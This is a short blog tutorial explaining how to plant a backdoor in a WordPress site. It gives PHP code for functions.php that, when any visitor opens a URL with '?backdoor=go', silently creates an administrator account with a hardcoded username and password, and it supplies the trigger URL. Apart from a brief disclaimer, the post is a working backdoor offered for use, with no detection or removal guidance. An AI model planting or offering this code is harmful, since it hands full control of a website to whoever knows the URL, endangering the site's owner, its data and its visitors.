How To Create Backdoor Admin Access in WordPress

In this post, we are going to create a backdoor for our WordPress website. This post is created for educational purpose only.

Must Read : Disable Annoying Self Pingbacks in WordPress

A backdoor is an undocumented way of getting access to an application with administrative privileges. The programmer may sometimes create a backdoor  so that application can be accessed for troubleshooting  or other purposes. A backdoor is a potential security exploit.

To create a backdoor for your WordPress website, paste the following code in your functions.php file.

add_action('wp_head', 'my_backdoor');
 
function my_backdoor() {
    If ($_GET['backdoor'] == 'go') {
        require('wp-includes/registration.php');
        If (!username_exists('harshal')) {
            $user_id = wp_create_user('harshal', 'pa55w0rd');
            $user = new WP_User($user_id);
            $user->set_role('administrator');
        }
    }
}

To trigger the above code simply visit http://yourdomain.com?backdoor=go.

This will create a new administrator account with username harshal and password pa55w0rd. Now, you can access the WordPress dashboard with this user.

Note : Using the above code is considered as a potential security exploit, use it at your own risk. I recommend you to use the above code for good and NOT for malicious purposes.

Leave a Comment.